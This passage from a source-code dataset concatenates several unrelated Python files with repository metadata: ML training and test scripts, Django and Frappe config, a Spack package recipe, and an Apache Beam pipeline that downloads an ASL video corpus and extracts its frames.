if int(classifyVector(np.array(lineArr), trainWeights)) != int(currLine[21]):
errorCount += 1
errorRate = (float(errorCount) / numTestVec)
print("the error rate of this test is: %f" % errorRate)
return errorRate
def multiTest():
"""
调用colicTest()10次并求结果的平均值
"""
numTests = 10
errorSum = 0.0
for k in range(numTests):
errorSum += colicTest()
print("after %d iterations the average error rate is: %f" % (numTests, errorSum/float(numTests)))
# 测试结果
# multiTest()
| 26.346591
| 101
| 0.586586
|
d9c57904cabc15c081975c093dd3d77c32947bfd
| 2,456
|
py
|
Python
|
segmentation/train/trainTorch.py
|
enjoy-the-science/brain-texts
|
2f90cff6b7efd610791b278579c62ba802eb0f02
|
[
"MIT"
] | null | null | null |
segmentation/train/trainTorch.py
|
enjoy-the-science/brain-texts
|
2f90cff6b7efd610791b278579c62ba802eb0f02
|
[
"MIT"
] | null | null | null |
segmentation/train/trainTorch.py
|
enjoy-the-science/brain-texts
|
2f90cff6b7efd610791b278579c62ba802eb0f02
|
[
"MIT"
] | null | null | null |
from segmentation.model.Unet224Torch import Unet224Torch
from segmentation.utils.ARDataset import ARDataset
from segmentation.utils.metrics import JaccardBCELoss, jaccard_metric
from segmentation.train.TrainerTorchUNET224 import TrainerTorchUNET224
from segmentation.utils.utils import split_train_test_data
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
import argparse
def arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--input", type=str,
help="Path to folder with patients")
parser.add_argument("-c", "--checkpoints", type=str,
help="Path to checkpoints folder")
parser.add_argument("-l", "--lr", type=float, default=0.001,
help="Learning rate. Default: 0.001")
parser.add_argument("-d", "--dice_weight", type=float, default=0.8,
help="Dice weight in error. Between 0 and 1. Default: 0.8")
parser.add_argument("-bs", "--batch_size", type=int, default=4,
help="Batch size. Default: 4")
parser.add_argument("-e", "--epochs", type=int, default=10,
help="Count of epochs. Default: 10")
parser.add_argument("-vs", "--valid_size", type=float, default=0.2,
help="Part of data for validation. Default: 0.2")
return parser.parse_args()
def main(opt):
checkpoint_path = opt.checkpoints
dice_weight = opt.dice_weight
lr = float(opt.lr)
batch_size = int(opt.batch_size)
data_path = opt.input
validation_size = opt.valid_size
epochs = int(opt.epochs)
model = Unet224Torch(1)
criterion = JaccardBCELoss(dice_weight)
metric = jaccard_metric
train, val = split_train_test_data(path=data_path, validation_size=validation_size)
train_dataset = ARDataset(train)
val_dataset = ARDataset(val)
train_loader = DataLoader(train_dataset, batch_size=batch_size)
val_loader = DataLoader(val_dataset, batch_size=batch_size)
prefix = "lr=%s_bs=%s_dice=%s" % (lr, batch_size, dice_weight)
optimizer = optim.Adam(model.parameters(), lr=lr)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
trainer = TrainerTorchUNET224(model, train_loader, val_loader, checkpoint_path, criterion, optimizer, prefix, device, epochs)
trainer.train_model()
if __name__ == '__main__':
opt = arguments()
main(opt)
| 36.656716
| 129
| 0.680782
|
b850a2ecf85ab9f6353814effa2c4add66ffc821
| 695
|
py
|
Python
|
api/admin.py
|
chikjib/Django-Rest-Api
|
5abeee768fe5e69ea474034c583388728745524c
|
[
"MIT"
] | null | null | null |
api/admin.py
|
chikjib/Django-Rest-Api
|
5abeee768fe5e69ea474034c583388728745524c
|
[
"MIT"
] | null | null | null |
api/admin.py
|
chikjib/Django-Rest-Api
|
5abeee768fe5e69ea474034c583388728745524c
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Post, Category, Comment
# from django.contrib.auth.admin import UserAdmin
class PostAdmin(admin.ModelAdmin):
list_display = ('title', 'body', 'featured_image')
prepopulated_fields = {'slug': ('title',)}
class CategoryAdmin(admin.ModelAdmin):
list_display = ('name',)
prepopulated_fields = {'slug': ('name',)}
class CommentAdmin(admin.ModelAdmin):
list_display = ('author_name', 'email', 'comment_body', 'created_at',)
admin.site.register(Post, PostAdmin)
admin.site.register(Category, CategoryAdmin)
admin.site.register(Comment, CommentAdmin)
# admin.site.register(CustomUser,UserAdmin)
| 28.958333
| 75
| 0.710791
|
bea7851fb60d4ec9b5ce36f83df8a16ef4e1cc2a
| 328
|
py
|
Python
|
covid19yemen/config/docs.py
|
alkuhlani/covid19yemen
|
7703b548a18479998b40da65f00c3f5035b77d91
|
[
"MIT"
] | null | null | null |
covid19yemen/config/docs.py
|
alkuhlani/covid19yemen
|
7703b548a18479998b40da65f00c3f5035b77d91
|
[
"MIT"
] | null | null | null |
covid19yemen/config/docs.py
|
alkuhlani/covid19yemen
|
7703b548a18479998b40da65f00c3f5035b77d91
|
[
"MIT"
] | null | null | null |
"""
Configuration for docs
"""
# source_link = "https://github.com/[org_name]/covid19yemen"
# docs_base_url = "https://[org_name].github.io/covid19yemen"
# headline = "App that does everything"
# sub_heading = "Yes, you got that right the first time, everything"
def get_context(context):
context.brand_html = "covid19yemen"
| 27.333333
| 68
| 0.734756
|
754adeffecd2ac37c1e4d822b9e25cd1aae41971
| 117
|
py
|
Python
|
main/request/reset_password.py
|
nguyentranhoan/uit-mobile
|
8546312b01373d94cf00c64f7eacb769e0f4ccce
|
[
"BSD-3-Clause"
] | null | null | null |
main/request/reset_password.py
|
nguyentranhoan/uit-mobile
|
8546312b01373d94cf00c64f7eacb769e0f4ccce
|
[
"BSD-3-Clause"
] | null | null | null |
main/request/reset_password.py
|
nguyentranhoan/uit-mobile
|
8546312b01373d94cf00c64f7eacb769e0f4ccce
|
[
"BSD-3-Clause"
] | null | null | null |
from pydantic import BaseModel, EmailStr
class ResetPassword(BaseModel):
email: EmailStr
new_password: str
| 16.714286
| 40
| 0.769231
|
2d4d3ccbc174ef1c1bc8577f6931b8afc6deaa85
| 3,470
|
py
|
Python
|
var/spack/repos/builtin/packages/minigmg/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 3
|
2021-09-29T02:14:40.000Z
|
2022-01-27T20:50:36.000Z
|
var/spack/repos/builtin/packages/minigmg/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 8
|
2022-02-28T11:30:18.000Z
|
2022-03-23T19:34:56.000Z
|
var/spack/repos/builtin/packages/minigmg/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
class Minigmg(Package):
"""miniGMG is a compact benchmark for understanding the performance
challenges associated with geometric multigrid solvers
found in applications built from AMR MG frameworks
like CHOMBO or BoxLib when running
on modern multi- and manycore-based supercomputers.
It includes both productive reference examples as well as
highly-optimized implementations for CPUs and GPUs.
It is sufficiently general that it has been used to evaluate
a broad range of research topics including PGAS programming models
and algorithmic tradeoffs inherit in multigrid. miniGMG was developed
under the CACHE Joint Math-CS Institute.
Note, miniGMG code has been supersceded by HPGMG. """
homepage = "http://crd.lbl.gov/departments/computer-science/PAR/research/previous-projects/miniGMG/"
url = "https://crd.lbl.gov/assets/Uploads/FTG/Projects/miniGMG/miniGMG.tar.gz"
version('master', sha256='1c2d27496a881f655f5e849d6a7a132625e535739f82575991c511cc2cf899ac')
variant('vec', default='ompif', description='Which method of vectorisation to use',
values=('ompif', 'sse', 'avx', 'simde'), multi=False)
variant('opt', default=False, description='Enable optimization flags for improved OpenMP')
depends_on('mpi')
# Set up SIMD Everywhere config
depends_on('simde', when='vec=simde')
patch('simde.patch', when='vec=simde')
# Patch to add timer for Aarch64 rather than rdtsc
patch('aarch64_time.patch', when='target=aarch64:')
# Replaces inline with inline static, for correct syntax
patch('inline_static.patch')
phases = ['build', 'install']
def build(self, spec, prefix):
cc = Executable(spec['mpi'].mpicc)
args = []
# Default optimisation level
if spec.satisfies('+opt'):
if self.spec.satisfies('%nvhpc'):
args.append('-fast')
else:
args.append('-Ofast')
else:
args.append('-O3')
# Add OpenMP flag
args += [self.compiler.openmp_flag]
args += ['miniGMG.c', 'mg.c', 'box.c', 'solver.c']
# Set the correct operators file - using the vec variant
if spec.satisfies('vec=sse'):
args += ['operators.sse.c']
elif spec.satisfies('vec=avx'):
args += ['operators.avx.c']
elif spec.satisfies('vec=simde'):
args += ['operators.simde.c']
else:
args += ['operators.ompif.c']
# Switch out timer file (depends on patch)
if spec.satisfies('target=aarch64:'):
args += ['timer.aarch64.c']
else:
args += ['timer.x86.c']
args += ['-D__MPI']
if spec.satisfies('+opt'):
args += ['-D__PREFETCH_NEXT_PLANE_FROM_DRAM']
args += ['-D__FUSION_RESIDUAL_RESTRICTION']
else:
args += ['-D__COLLABORATIVE_THREADING=6']
args += ['-D__TEST_MG_CONVERGENCE', '-D__PRINT_NORM', '-D__USE_BICGSTAB']
args += ['-o', 'run.miniGMG', '-lm']
cc(*args)
def install(self, spec, prefix):
mkdir(prefix.bin)
install('run.miniGMG', prefix.bin)
mkdir(prefix.jobs)
install('job*', prefix.jobs)
| 34.7
| 104
| 0.634006
|
8786e06a5aa7994263f127062fd9ca985eeb1f24
| 225,235
|
py
|
Python
|
api/data_extractor__beam.py
|
sacontreras/fids-capstone-asl-translation
|
4d26b986f06668d979478fcb5af7279ad0fc8fe9
|
[
"W3C",
"DOC",
"Unlicense"
] | 1
|
2021-03-09T23:46:06.000Z
|
2021-03-09T23:46:06.000Z
|
api/data_extractor__beam.py
|
sacontreras/fids-capstone-asl-translation
|
4d26b986f06668d979478fcb5af7279ad0fc8fe9
|
[
"W3C",
"DOC",
"Unlicense"
] | null | null | null |
api/data_extractor__beam.py
|
sacontreras/fids-capstone-asl-translation
|
4d26b986f06668d979478fcb5af7279ad0fc8fe9
|
[
"W3C",
"DOC",
"Unlicense"
] | null | null | null |
from __future__ import absolute_import
import base64
import io
import logging
import os
import random
import re
import sys
import time
import urllib
import zipfile
import apache_beam as beam
# import apache_beam.runners.interactive.interactive_beam as ib
import apache_beam.io.fileio
# from apache_beam.transforms.sql import SqlTransform
import apache_beam.transforms.sql
import cv2
import numpy as np
from apache_beam.io.filesystems import FileSystems, GCSFileSystem
from apache_beam.options.pipeline_options import PipelineOptions
from api import beam__common, data_extractor__common, fidscs_globals, fileio
from api.signstreamxmlparser_refactored.analysis import signstream as ss
from api.beam__common import FIDSCapstonePipelineOptions
# from tensorflow.keras.preprocessing.image import img_to_array, load_img
def prepare_output_str(str, label=""):
return f"{label+': ' if len(label)>0 else ''}{str}"
def boostrap_signstream_corpus(d_corpus_info, d_pl_options, label=""):
"""
d_corpus_info MUST be a dict as follows:
{
'tmp_dir': fidscs_globals.TMP_DIR,
'corpus_archive': fidscs_globals.CORPUS_ARCHIVE
}
this function downloads d_corpus_info['corpus_archive'] from http://secrets.rutgers.edu/dai/xml
and extracts it to fileio.path_join(d_corpus_info['tmp_dir'], d_corpus_info['corpus_archive'])
(assuming that has not already been done - i.e. if not os.path.isdir(fileio.path_join(d_corpus_info['tmp_dir'], d_corpus_info['corpus_archive']))
or len(os.listdir(fileio.path_join(d_corpus_info['tmp_dir'], d_corpus_info['corpus_archive'])))==0
)
if the datasets exist in the storage path then this function does nothing
(other than printing out the paths to the datasets)
"""
print(prepare_output_str(f"CORPUS-INDEX BOOTSTRAP INFO: {d_corpus_info}", label=label))
# download archive
"""
requires:
d_corpus_info['corpus_archive']
d_corpus_info['tmp_dir']
"""
corpus_parent_dir = d_corpus_info['tmp_dir']
corpus_dir = fileio.path_join(corpus_parent_dir, d_corpus_info['corpus_archive'].split('.')[0])
remote_archive_path = 'http://secrets.rutgers.edu/dai/xml/'+d_corpus_info['corpus_archive']
local_archive_parent_dir = d_corpus_info['tmp_dir']
local_archive_path = fileio.path_join(local_archive_parent_dir, d_corpus_info['corpus_archive'])
memfile = data_extractor__common.download_to_memfile(remote_archive_path, block_sz=8192, display=False)
zip_ref = zipfile.ZipFile(memfile, 'r')
print(f"unzipping {remote_archive_path} in-memory...")
# zip_ref.printdir()
if not fileio.dir_path_exists(corpus_dir, d_pl_options)[0]:
fileio.make_dirs(corpus_dir, d_pl_options)
for doc_file_path_suffix in fidscs_globals.CORPUS_DOC_FILE_PATH_SUFFIXES:
bytes_unzipped = zip_ref.read(doc_file_path_suffix)
with fileio.open_file_write(corpus_parent_dir+'/'+doc_file_path_suffix) as f:
f.write(bytes_unzipped)
f.close()
zip_ref.close()
memfile.close()
print(f"\tDONE")
return [fileio.path_join(corpus_dir,"*")]
class SignstreamCorpusBootstrapper(beam__common.PipelinePcollElementProcessor):
def __init__(self, d_pl_options, label=""):
super(SignstreamCorpusBootstrapper, self).__init__(
fn_pcoll_element_processor=boostrap_signstream_corpus,
kargs={'d_pl_options':d_pl_options,'label':label},
return_result=True
)
def get_video_segment_download_info(vid_index_schemad_pcoll_row, d_pl_options):
"""
vid_index_schemad_pcoll_row:
beam.Row(
target_video_filename=str(urllib.parse.quote(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[0]])),
video_seq_id=int(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[1]]),
perspective_cam_id=int(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[2]]),
compressed_mov_url=str(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[3]]),
uncompressed_avi_url=str(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[4]]),
uncompressed_avi_mirror_1_url=str(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[5]]),
uncompressed_avi_mirror_2_url=str(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[6]])
)
return:
listof(
{
'target_video_fname': target_video_fname,
'target_video_frames_dir': target_video_frames_dir,
'segment_url': str(url),
'segment_fname': str(url).split('/')[-1]
}
)
"""
target_video_fname = vid_index_schemad_pcoll_row.target_video_filename
target_video_frames_dir = fileio.path_join(d_pl_options[fidscs_globals.OPT_NAME_STITCHED_VIDEO_FRAMES_DIR], target_video_fname.split('.')[0])
segment_urls = vid_index_schemad_pcoll_row.compressed_mov_url.split(';') # this can be a list, separated by ';'
return [{'target_video_fname': target_video_fname, 'target_video_frames_dir': target_video_frames_dir, 'segment_url': str(url), 'segment_fname': str(url).split('/')[-1]} for url in segment_urls]
class VideoSegmentInfoGatherer(beam__common.PipelinePcollElementProcessor):
def __init__(self, d_pl_options):
super(VideoSegmentInfoGatherer, self).__init__(
fn_pcoll_element_processor=get_video_segment_download_info,
kargs={'d_pl_options':d_pl_options},
return_result=True
)
def beam_download_target_video_segment(d_target_vid_seg_download_info, d_pl_options, max_fail=fidscs_globals.DOWNLOAD_MAX_FAIL_COUNT, label=""):
"""
expects d_target_vid_seg_download_info: {'target_video_fname': target_video_fname, 'target_video_frames_dir': target_video_frames_dir, 'segment_url': url, 'segment_fname': url.split('/')[-1]}
"""
segment_url = d_target_vid_seg_download_info['segment_url']
segment_fname = d_target_vid_seg_download_info['segment_fname']
video_dir = d_pl_options[fidscs_globals.OPT_NAME_VIDEO_DIR]
if not fileio.dir_path_exists(video_dir, d_pl_options)[0]:
fileio.make_dirs(video_dir, d_pl_options)
local_segment_path = fileio.path_join(video_dir, segment_fname)
n_fail = 0
if not fileio.file_path_exists(local_segment_path, d_pl_options)[0]:
while n_fail < max_fail:
try:
memfile = data_extractor__common.download_to_memfile(segment_url, block_sz=fidscs_globals._1MB, display=False) # returns with memfile.seek(0)
memfile.seek(0)
with fileio.open_file_write(local_segment_path) as f:
f.write(memfile.getbuffer())
f.close()
print(f"{label+': ' if len(label)>0 else ''}Downloaded {segment_url} to {local_segment_path}")
memfile.close()
break
except Exception as e:
n_fail += 1
if n_fail < max_fail:
print(f"{label+': ' if len(label)>0 else ''}*** {e} ***: fail count: {n_fail}, max fail: {max_fail} --> sleeping 1 second, then trying again...")
time.sleep(fidscs_globals.DOWNLOAD_FAIL_SLEEP_TIME)
else:
print(f"{label+': ' if len(label)>0 else ''}*** {e} ***: fail count: {n_fail}, max fail: {max_fail} --> giving up!")
else:
print(f"{label+': ' if len(label)>0 else ''}Found target video ({d_target_vid_seg_download_info['target_video_fname']}) segment {local_segment_path} (downloaded from {segment_url})".format(local_segment_path, segment_url))
return [d_target_vid_seg_download_info] # passthrough
class VideoSegmentDownloader(beam__common.PipelinePcollElementProcessor):
def __init__(self, d_pl_options, label=""):
super(VideoSegmentDownloader, self).__init__(
fn_pcoll_element_processor=beam_download_target_video_segment,
kargs={'d_pl_options':d_pl_options,'label':label},
return_result=True
)
def capture_segment_video(vid_segment_path, truly_local_vid_dir, d_pl_options, debug=False):
video_fname = vid_segment_path.split('/')[-1]
truly_local_target_video_frames_dir = None
fs = FileSystems.get_filesystem(vid_segment_path)
if type(fs) == GCSFileSystem:
if debug: print(f"\n\n\tattempting to open video {vid_segment_path} for reading...")
with fileio.open_file_read(vid_segment_path) as f:
if debug: print(f"\t\tSUCCESS")
# now read from local bytes and write to GCS
buffer = f.read()
truly_local_vid_segment_path = truly_local_vid_dir+'/'+video_fname
if debug: print(f"\t\tattempting to write {truly_local_vid_segment_path} (truly) locally...")
with fileio.open_file_write(truly_local_vid_segment_path) as f_local:
f_local.write(buffer)
f_local.close()
if debug: print(f"\t\t\tSUCCESS")
f.close()
vid_segment_path = truly_local_vid_segment_path
# (truly local) dir for saving frames
truly_local_target_video_frames_dir = truly_local_vid_dir+'/'+fidscs_globals.STICHED_VIDEO_FRAMES_DIR_NAME+'/'+video_fname.split('.')[0]
if debug: print(f"\t\t\tattempting to create directory {truly_local_target_video_frames_dir} (truly_local_target_video_frames_dir) for frames extracted from (truly local) video {truly_local_vid_segment_path}...")
if not fileio.dir_path_exists(truly_local_target_video_frames_dir, d_pl_options)[0]:
if debug: print(f"\t\t\t\tcreating {truly_local_target_video_frames_dir}...")
fileio.make_dirs(truly_local_target_video_frames_dir, d_pl_options)
truly_local_target_video_frames_dir_exists = fileio.dir_path_exists(truly_local_target_video_frames_dir, d_pl_options)[0]
if debug: print(f"\t\t\t\t\t{truly_local_target_video_frames_dir} exists: {truly_local_target_video_frames_dir_exists}")
if not truly_local_target_video_frames_dir_exists:
raise Exception(f"required directory truly_local_target_video_frames_dir {truly_local_target_video_frames_dir_exists} does not exist")
if debug: print(f"\t\t\tattempting to capture (cv2.VideoCapture) video {vid_segment_path})...")
# finally, capture the video bytes
return cv2.VideoCapture(vid_segment_path), truly_local_target_video_frames_dir
def write_frame_to_file(frame, index, target_video_frames_dir, truly_local_target_video_frames_dir=None, debug=False):
local_frame_path = fileio.path_join(target_video_frames_dir, f"{index}.jpg") # this is the final frame path
if truly_local_target_video_frames_dir is not None:
# write truly local frame file
truly_local_frame_path = truly_local_target_video_frames_dir+'/'+f"{index}.jpg"
if debug: print(f"\t\t\t\t\t\tattempting to write {truly_local_frame_path} frame...")
cv2.imwrite(truly_local_frame_path, frame)
if debug: print(f"\t\t\t\t\t\t\tSUCCESS")
if debug: print(f"\t\t\t\t\t\t\tattempting to open {truly_local_frame_path} for read...")
with fileio.open_file_read(truly_local_frame_path) as f_truly_local_frame:
buffer = f_truly_local_frame.read()
if debug: print(f"\t\t\t\t\t\t\t\tSUCCESS")
if debug: print(f"\t\t\t\t\t\t\t\t\tattempting to open {local_frame_path} for final write...")
with fileio.open_file_write(local_frame_path) as f_frame_final:
f_frame_final.write(buffer)
f_frame_final.close()
if debug: print(f"\t\t\t\t\t\t\t\t\t\tSUCCESS")
buffer = None
f_truly_local_frame.close()
else:
if debug: print(f"\t\t\t\t\t\t\t\t\tattempting to open {local_frame_path} for final write...")
cv2.imwrite(local_frame_path, frame)
if debug: print(f"\t\t\t\t\t\t\t\t\t\tSUCCESS")
def beam_extract_frames(tpl_target_video_extraction_info, d_pl_options, label="", debug=False):
"""
expects tpl_target_video_extraction_info: (video_fname, list({'target_video_fname': target_video_fname, 'target_video_frames_dir': target_video_frames_dir, 'segment_url': str(url), 'segment_fname': str(url).split('/')[-1]}))
"""
# # log_results = []
target_video_fname = tpl_target_video_extraction_info[0]
segment_dicts = sorted(tpl_target_video_extraction_info[1], key=lambda segment_dict: segment_dict['segment_fname'])
target_video_frames_dir = segment_dicts[0]['target_video_frames_dir']
target_stitched_vid_name = target_video_frames_dir.split(os.path.sep)[-1]
if not fileio.dir_path_exists(target_video_frames_dir, d_pl_options)[0]:
fileio.make_dirs(target_video_frames_dir, d_pl_options)
video_dir = d_pl_options[fidscs_globals.OPT_NAME_VIDEO_DIR]
local_vid_segment_paths = [fileio.path_join(video_dir, segment_dict['segment_fname']) for segment_dict in segment_dicts]
for segment_dict in segment_dicts:
segment_dict['n_frames_extracted'] = 0
# create local dir for extraction (since OpenCV works only with local file system currently) if we have GCS filesystem
truly_local_vid_dir = None
truly_local_vid_dir_suffix = None
fs = FileSystems.get_filesystem(video_dir)
if type(fs) == GCSFileSystem:
truly_local_vid_dir_suffix = '/'.join(video_dir.split('/')[1:])
truly_local_vid_dir = '/tmp'+truly_local_vid_dir_suffix
# print(f"\t\tGCS storage detected! Extracting frames to truly_local_vid_dir {truly_local_vid_dir} (and will then upload to GCS after that)...")
if debug: print(f"\t\t{truly_local_vid_dir} exists: {fileio.dir_path_exists(truly_local_vid_dir, d_pl_options)}")
if not fileio.dir_path_exists(truly_local_vid_dir, d_pl_options)[0]:
if debug: print(f"\tcreating {truly_local_vid_dir}...")
truly_local_vid_dir_path_segs = truly_local_vid_dir.split('/')
if debug: print(f"\t\ttruly_local_vid_dir_path_segs: {truly_local_vid_dir_path_segs}")
s_cum_path = ''
for i, truly_local_vid_dir_path_seg in enumerate(truly_local_vid_dir_path_segs[1:]):
s_cum_path += '/'+truly_local_vid_dir_path_seg
fileio.make_dirs(s_cum_path, d_pl_options)
if debug: print(f"\t\t{s_cum_path} exists: {fileio.dir_path_exists(s_cum_path, d_pl_options)}")
vc_results = [capture_segment_video(local_vid_segment_path, truly_local_vid_dir, d_pl_options, debug=debug) for local_vid_segment_path in local_vid_segment_paths]
vid_caps = [vc_result[0] for vc_result in vc_results]
truly_local_target_video_frames_dirs = [vc_result[1] for vc_result in vc_results]
for seg_vid_cap in vid_caps:
seg_vid_cap.set(cv2.CAP_PROP_FPS, fidscs_globals.FPS)
frame_counts = list(map(lambda vc: int(vc.get(cv2.CAP_PROP_FRAME_COUNT)), vid_caps))
n_frames_expected = sum(frame_counts)
failed_target_videos = []
n_stitched_frames = 0
if n_frames_expected > 0:
# get count of existing stitched frames in target_stitched_vid_frames_dir
n_stitched_frames = len(fileio.list_dir(target_video_frames_dir, d_pl_options))
b_restitch = n_stitched_frames < n_frames_expected
n_stitched_frames = 0 if b_restitch else n_stitched_frames
for i, seg_vid_cap in enumerate(vid_caps):
segment_dict = segment_dicts[i]
_n_frames_expected = frame_counts[i]
if b_restitch:
success, frame = seg_vid_cap.read()
n_frames = 0
while success:
write_frame_to_file(
frame,
n_stitched_frames,
target_video_frames_dir,
truly_local_target_video_frames_dir=truly_local_target_video_frames_dirs[i],
debug=debug
)
n_frames += 1
n_stitched_frames += 1
success, frame = seg_vid_cap.read()
seg_path = local_vid_segment_paths[i]
seg_fname = seg_path.split(os.path.sep)[-1]
if n_frames != _n_frames_expected:
print(f"{label+': ' if len(label)>0 else ''}{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} Cannot stitch together target video {target_video_fname} since {_n_frames_expected} frames were expected from segment {seg_fname} ({seg_path}) but only {n_frames} were successfully extracted")
failed_target_videos.append(target_video_fname)
fail = True
break
else:
print(f"{label+': ' if len(label)>0 else ''}Added {n_stitched_frames} frames from segment {seg_fname} for target video {target_video_fname} (stitched-frames dir {target_video_frames_dir})")
else:
n_frames = _n_frames_expected
print(f"{label+': ' if len(label)>0 else ''}Found existing stiched-frames for {target_stitched_vid_name} ({n_stitched_frames} frames in {target_video_frames_dir})")
segment_dict['n_frames_extracted'] = n_frames
else:
if fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
print(f"\t{fidscs_globals.VALIDATION_WARNING_TEXT} Cannot stitch together target video {target_video_fname} since cv2.CAP_PROP_FRAME_COUNT reports segments have zero frames")
failed_target_videos.append(target_video_fname)
fail = True
if truly_local_vid_dir is not None:
for truly_local_target_video_frames_dir in truly_local_target_video_frames_dirs:
fileio.delete_file(truly_local_target_video_frames_dir, d_pl_options, recursive=True, debug=True)
return [(tpl_target_video_extraction_info[0], n_stitched_frames, segment_dicts)]
class SegmentFrameExtractor(beam__common.PipelinePcollElementProcessor):
def __init__(self, d_pl_options, label="", debug=False):
super(SegmentFrameExtractor, self).__init__(
fn_pcoll_element_processor=beam_extract_frames,
kargs={'d_pl_options':d_pl_options,'label':label,'debug':debug},
return_result=True
)
def process_corpus_document(corpus_readable_file, d_pl_options, label, ref_CorpusDocumentFileProcessor):
xml_db_path = str(corpus_readable_file.metadata.path)
xml_db_fname = xml_db_path.split(os.path.sep)[-1].strip()
# f = beam.io.filesystems.FileSystems.open(xml_db_path)
f = fileio.open_file_read(xml_db_path)
if sys.version_info >= (3,0):
f = io.TextIOWrapper(f)
xml_lines_with_cr = f.readlines()
f.close()
# encode each row to bytes
raw_xml_b64 = base64.b64encode("".join([xml_line.replace('\n','').strip() for xml_line in xml_lines_with_cr]).encode('ascii')) # we end up with a string containing the base-64 encoded "characters"
# debug
# print(f"length of (base-64 encoded) XML document {xml_db_fname}: {len(raw_xml_b64)}")
row = beam.Row(
# SCHEMA_COL_NAMES__CORPUS_DS = [
# 'DocumentID',
# 'Filename',
# 'XML_B64',
# 'LEN'
# ]
DocumentID=int(ref_CorpusDocumentFileProcessor.next_doc_id),
Filename=xml_db_fname,
XML_B64=raw_xml_b64,
LEN=len(raw_xml_b64)
)
ref_CorpusDocumentFileProcessor.next_doc_id += 1
fileio.delete_file(xml_db_path, d_pl_options)
# if fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.ERROR:
print(f"PROCESSED/DELETED corpus document {xml_db_path}") # always show this
return [row]
class CorpusDocumentFileProcessor(beam__common.PipelinePcollElementProcessor):
def __init__(self, d_pl_options, label=""):
super(CorpusDocumentFileProcessor, self).__init__(
fn_pcoll_element_processor=process_corpus_document,
kargs={'d_pl_options':d_pl_options,'label':label,'ref_CorpusDocumentFileProcessor':self},
return_result=True
)
self.label = label
self.next_doc_id = 0
# class RowIndexer(beam.DoFn):
# def __init__(self, var_name_prefix):
# self.var_name = var_name_prefix+"_next_id"
# def process(self, element):
# tpl = (fidscs_globals.D_IN_MEMORY_VARS.get(self.var_name, 0), element)
# fidscs_globals.D_IN_MEMORY_VARS[self.var_name] = fidscs_globals.D_IN_MEMORY_VARS.get(self.var_name, 0)+1
# return [tpl]
def decode_XML(corpus_index_schemad_pcoll_row):
"""
corpus_index_schemad_pcoll_row:
beam.Row(
# SCHEMA_COL_NAMES__CORPUS_DS = [
# 'DocumentID',
# 'Filename',
# 'XML_B64',
# 'LEN'
# ]
DocumentID=int(d_corpus_document_info[fidscs_globals.SCHEMA_COL_NAMES__CORPUS_DS[0]]),
Filename=str(d_corpus_document_info[fidscs_globals.SCHEMA_COL_NAMES__CORPUS_DS[1]]),
XML_B64=d_corpus_document_info[fidscs_globals.SCHEMA_COL_NAMES__CORPUS_DS[2]],
LEN=int(d_corpus_document_info[fidscs_globals.SCHEMA_COL_NAMES__CORPUS_DS[3]])
)
"""
raw_XML_b64_as_str = corpus_index_schemad_pcoll_row.XML_B64
raw_XML_b64_as_str = str(raw_XML_b64_as_str[2:-1]) # strip
raw_XML_b64_to_ascii = raw_XML_b64_as_str.encode('ascii')
raw_XML_b64 = base64.b64decode(raw_XML_b64_to_ascii)
raw_xml = raw_XML_b64.decode('ascii').strip()
# print(raw_xml)
return [
{
'DocumentID': corpus_index_schemad_pcoll_row.DocumentID,
'Filename': corpus_index_schemad_pcoll_row.Filename,
'XML': raw_xml,
'LEN': len(raw_xml)
}
]
class SSXMLDecoder(beam__common.PipelinePcollElementProcessor):
def __init__(self, d_pl_options, label=""):
super(SSXMLDecoder, self).__init__(
fn_pcoll_element_processor=decode_XML,
kargs={'d_pl_options':d_pl_options,'label':label},
return_result=True
)
def assign_to_global__raw_xml_b64_max_len(max_xml_b64_len):
fidscs_globals.MAX_RAW_XML_B64_LEN = max_xml_b64_len+4
# debug
# print(f"ASSIGNED fidscs_globals.MAX_RAW_XML_B64_LEN={fidscs_globals.MAX_RAW_XML_B64_LEN}")
return [max_xml_b64_len]
def boostrap_target_video_index(d_vid_indexes_info, d_pl_options):
if d_pl_options is None or not isinstance(d_pl_options, dict):
raise ValueError(f"require d_pl_options as dict but got {type(d_pl_options)}")
"""
d_vid_indexes_info MUST be a dict as follows:
{
'vid_indexes_dir': fidscs_globals.VIDEO_INDEXES_DIR,
'sel_vid_index_path': fidscs_globals.SELECTED_VIDEO_INDEX_PATH,
'video_indexes_archive': fidscs_globals.VIDEO_INDEXES_ARCHIVE,
'tmp_dir': fidscs_globals.TMP_DIR,
'video_ds_path': fidscs_globals.VIDEO_DS_PATH
}
this function downloads d_vid_indexes_info['video_indexes_archive'] from http://www.bu.edu/asllrp/ncslgr-for-download
and extracts it to FileSystems.join(d_vid_indexes_info['tmp_dir'], d_vid_indexes_info['video_indexes_archive'])
(assuming that has not already been done - i.e. if not os.path.isdir(d_vid_indexes_info['vid_indexes_dir']) or not os.path.isfile(d_vid_indexes_info['sel_vid_index_path']))
this function returns d_vid_indexes_info['sel_vid_index_path'] only after the above has been done
"""
